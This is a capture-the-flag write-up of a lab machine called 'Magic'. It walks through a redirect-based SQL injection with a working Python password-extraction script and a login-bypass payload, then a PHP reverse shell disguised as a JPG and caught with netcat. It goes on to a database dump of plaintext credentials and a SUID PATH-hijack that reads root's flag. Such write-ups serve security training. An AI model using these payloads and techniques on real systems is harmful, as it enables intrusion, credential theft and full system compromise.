TL;DR

  • Extract the credentials for the admin section with a redirect based SQL injection.
  • Upload a PHP file tampered with the correct extension and magic bytes to get a reverse shell.
  • Dump the database to get the user password.
  • Create a fake lshw script and change the PATH to exploit sysinfo SUID.

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/magic$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN magic.txt
# Nmap 7.60 scan initiated Sat Apr 18 22:08:05 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN magic.txt 10.10.10.185
Increasing send delay for 10.10.10.185 from 0 to 5 due to 117 out of 389 dropped probes since last increase.
Warning: 10.10.10.185 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.185 from 640 to 1000 due to 217 out of 723 dropped probes since last increase.
Nmap scan report for magic.htb (10.10.10.185)
Host is up, received reset ttl 63 (0.098s latency).
Scanned at 2020-04-18 22:08:05 CEST for 184s
Not shown: 49740 closed ports, 15793 filtered ports
Reason: 49740 resets and 15793 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
|   256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:11:09 2020 -- 1 IP address (1 host up) scanned in 184.15 seconds

So we find 2 useful services:

  • SSH (22)
  • Apache (80)

The website is an image gallery with a login form.

Website

Login

Sqli redirect

On the login form, we can see that if we submit a wrong username, we have a 200 response, but if we submit a valid answer we have a redirection (302).

Login Wrong

Login True

There’s two ways to solve this step:

  • Bypass the login form with username=admin' OR 1; -- &password=test
  • Extract the password with an SQLi redirect.

We can extract the admin password with a redirect based SQL injection. Based on the response code of the request, we can determine the value of each char of the password (if the char is correct: 302 response otherwise 200).

We can use the following script to retrieve the password:

#!/usr/bin/python3.6
# coding: utf-8
import requests
import string

if __name__ == '__main__':
    url = 'http://magic.htb/login.php'
    params = {'username': 'admin', 'password': None}

    password = ""

    for i in range(1, 30):
        for letter in string.printable:
            params['password'] = 'admin\' OR substr(password, {}, 1) = {};-- '.format(i, hex(ord(letter)))
            request = requests.post(url, data=params, allow_redirects=False)

            if request.status_code == 302:
                password += letter
                print('Password: ' + password)
                break

    print("Username: {0}\nPassword: {1}".format(params['username'], password))

We retrieve the password for admin: th3s3usw4sk1ng.

The injection is not case sensitive, we can login with it, but we’ll have an issue while log in with theseus user later.

File upload

We now have access to the upload part.

Upload

If we try to upload a PHP file, we have the following error: ‘Sorry, only JPG, JPEG & PNG files are allowed.

Wrong upload

Let’s try to modify the extension with: ‘magnussen.php.test.jpg’

Upload Wrong

Nice, we have another error message, we’re on the good track. Let’s try to change the mime type and magic byte in order to upload a reverse shell.

The Magic bytes for JPG are: FF D8 FF DB

Successful upload

It seems that we’ve managed to upload our reverse shell, let’s try to use it by calling: magic.htb/images/uploads/magnussen.php.test.jpg

magnussen@funcMyLife:~/magic$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from magic.htb 57776 received!
Linux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 11:25:27 up 13 min,  3 users,  load average: 0.63, 1.39, 0.92
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
theseus  pts/5    10.10.14.90      11:15    9:27   0.03s  0.03s -bash
theseus  pts/6    10.10.15.221     11:15    2:55   0.03s  0.03s -bash
theseus  pts/8    10.10.15.221     11:15    0.00s  0.03s  0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Theseus user

Let’s see what we’ve got:

$ ls -alh /home/theseus
total 572K
drwxr-xr-x 15 theseus theseus 4.0K Apr 23 11:58 .
drwxr-xr-x  3 root    root    4.0K Oct 15  2019 ..
-rw-------  1 theseus theseus 7.2K Apr 15 23:50 .ICEauthority
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3.7K Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4.0K Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4.0K Oct 22  2019 .config
drwx------  3 theseus theseus 4.0K Oct 21  2019 .gnupg
drwx------  3 theseus theseus 4.0K Oct 21  2019 .local
drwx------  2 theseus theseus 4.0K Apr 23 11:51 .ssh
drwxr-xr-x  2 theseus theseus 4.0K Apr 23 11:58 Desktop
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Downloads
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Public
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Templates
drwxr-xr-x  2 theseus theseus 4.0K Oct 22  2019 Videos
-r--------  1 theseus theseus   33 Apr 23 11:50 user.txt
-rwsr-sr-x  1 theseus theseus 488K Apr 23 11:58 wget
$ ls -alh /var/www/Magic
total 52K
drwxr-xr-x 4 www-data www-data 4.0K Mar 17 09:10 .
drwxr-xr-x 4 root     root     4.0K Mar 13 06:07 ..
-rwx---r-x 1 www-data www-data  162 Oct 18  2019 .htaccess
drwxrwxr-x 6 www-data www-data 4.0K Jun  6  2019 assets
-rw-r--r-- 1 www-data www-data  881 Oct 16  2019 db.php5
drwxr-xr-x 4 www-data www-data 4.0K Apr 14 05:04 images
-rw-rw-r-- 1 www-data www-data 4.5K Oct 22  2019 index.php
-rw-r--r-- 1 www-data www-data 5.5K Oct 22  2019 login.php
-rw-r--r-- 1 www-data www-data   72 Oct 18  2019 logout.php
-rw-r--r-- 1 www-data www-data 4.5K Oct 22  2019 upload.php
$ cat /var/www/Magic/db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Ok, so it seems that we have a user called theseus and the credentials for the database, let’s try to switch to theseus with the credentials we’ve retrieved from the SQL injection.

$ su theseus
su: must be run from a terminal
$ python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh: 4: python: not found
$ find / -name python 2>> /dev/null
/usr/share/bash-completion/helpers/python
/usr/share/bash-completion/completions/python
/usr/share/python
/usr/share/gcc-8/python
/usr/share/gdb/python
/snap/core18/1223/etc/apparmor.d/abstractions/python
/snap/core18/1223/usr/share/gcc-8/python
/snap/core18/1223/var/lib/python
/snap/core18/1668/etc/apparmor.d/abstractions/python
/snap/core18/1668/usr/share/gcc-8/python
/snap/core18/1668/var/lib/python
/snap/core/8689/etc/apparmor.d/abstractions/python
/snap/core/8689/usr/share/bash-completion/completions/python
/snap/core/8689/usr/share/gcc-5/python
/snap/core/8689/var/lib/python
/snap/core/7917/etc/apparmor.d/abstractions/python
/snap/core/7917/usr/share/bash-completion/completions/python
/snap/core/7917/usr/share/gcc-5/python
/snap/core/7917/var/lib/python
/etc/apparmor.d/abstractions/python
/var/lib/python
$ ls /var/lib/python
python3.6_installed
$ su theseus
su: must be run from a terminal
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ su theseus
su theseus
Password: th3s3usw4sk1ng

su: Authentication failure

Ok, so first we had to get a proper shell (tty) and use python3 to set it. The password we’ve retrieved earlier isn’t valid because the SQL injection wasn’t case sensitive, let’s dump the database and retrieve the password.

$ mysqldump -u theseus --password=iamkingtheseus Magic
mysqldump -u theseus --password=iamkingtheseus Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version	5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-23 12:05:25

The real password is “Th3s3usW4sK1ng”, let’s switch to theseus and retrieve the user.txt

$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/$ cd  
cd
theseus@ubuntu:~$ cat user.txt
cat user.txt
b41026786625181e90e55a74f031b0bb

I AM ROOT

Sysinfo

Ok, we just have to privesc now, let’s check the SUID binaries.

theseus@ubuntu:~$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-- 1 root dip 382696 Feb 11 07:05 /usr/sbin/pppd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 Jan 31 09:18 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 10312 Dec  9 02:03 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 Dec 18 00:15 /usr/lib/xorg/Xorg.wrap
-rwsr-sr-x 1 root root 109432 Oct 30 05:17 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Aug 22  2019 /snap/core18/1223/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1223/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1223/bin/su
-rwsr-xr-x 1 root root 26696 Aug 22  2019 /snap/core18/1223/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1223/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1223/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1223/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1223/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1223/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17  2018 /snap/core18/1223/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1223/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Aug 22  2019 /snap/core18/1668/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1668/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1668/bin/su
-rwsr-xr-x 1 root root 26696 Aug 22  2019 /snap/core18/1668/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1668/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1668/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1668/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1668/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1668/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oct 10  2019 /snap/core18/1668/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1668/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40152 Jan 27 06:28 /snap/core/8689/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/8689/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/8689/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/8689/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27 06:28 /snap/core/8689/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/8689/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/8689/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/8689/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/8689/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/8689/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31 10:37 /snap/core/8689/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 04:40 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/8689/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Feb 12 08:34 /snap/core/8689/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/8689/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Aug 23  2019 /snap/core/7917/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7917/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7917/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7917/bin/su
-rwsr-xr-x 1 root root 27608 Aug 23  2019 /snap/core/7917/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan  8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping

Mmmmh, after googling few things I’ve found out that sysinfo had a privilege escalation vulnerability. Let’s check how sysinfo works with pspy (results are truncated):

magnussen@funcMyLife:~/magic$ python -m SimpleHTTPServer
theseus@ubuntu:~$ wget 10.10.14.134:8000/pspy64
wget 10.10.14.134:8000/pspy64
--2020-04-23 12:16:11--  http://10.10.14.134:8000/pspy64
Connecting to 10.10.14.134:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.94M   169KB/s    in 20s     

2020-04-23 12:16:31 (154 KB/s) - ‘pspy64’ saved [3078592/3078592]
theseus@ubuntu:~$ sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/2/0                         memory     16KiB L1 cache
/0/2/1                         memory     16KiB L1 cache
/0/2/2                         memory     512KiB L2 cache
/0/2/3                         memory     512KiB L2 cache
/0/3                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/18.7                    bridge     PCI Express Root Port
/0/47              scsi0       storage    
/0/47/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Device     Boot Start      End  Sectors Size Id Type
/dev/sda1  *     2048 41940991 41938944  20G 83 Linux

Disk /dev/loop11: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 2000.000
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 4000.00
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        835M        124M        6.7M        2.9G        2.7G
Swap:          947M        2.5M        944M
theseus@ubuntu:~$ /tmp/pspy64
2020/04/23 15:47:12 CMD: UID=0    PID=4330   | lshw -short
2020/04/23 15:47:12 CMD: UID=0    PID=4329   | sh -c lshw -short
2020/04/23 15:47:12 CMD: UID=0    PID=4328   | sysinfo
2020/04/23 15:47:19 CMD: UID=0    PID=4331   |
2020/04/23 15:47:19 CMD: UID=0    PID=4332   |
2020/04/23 15:47:19 CMD: UID=0    PID=4333   |
2020/04/23 15:47:19 CMD: UID=0    PID=4334   | sh -c fdisk -l
2020/04/23 15:47:19 CMD: UID=0    PID=4335   | fdisk -l

Ok so it seems that sysinfo uses lshw to get info on devices. It doesn’t use the absolute path, maybe we can exploit that.

If we create a script called lshw in /tmp and add the directory to our path maybe we can read the root.txt.

theseus@ubuntu:/tmp$ echo 'cat /root/root.txt' > lshw
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
theseus@ubuntu:/tmp$ sysinfo
====================Hardware Info====================
c1d98a38edd0f0bceab347625c5ca59d

====================Disk Info====================
Disk /dev/loop0: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 2000.000
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 4000.00
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        641M        1.7G        7.2M        1.5G        2.9G
Swap:          947M          0B        947M

Yes, we’ve retrieved the root.txt at the beginning of the output: c1d98a38edd0f0bceab347625c5ca59d

This was a great challenge, I’ve learned a lot of things, thanks a lot TRX!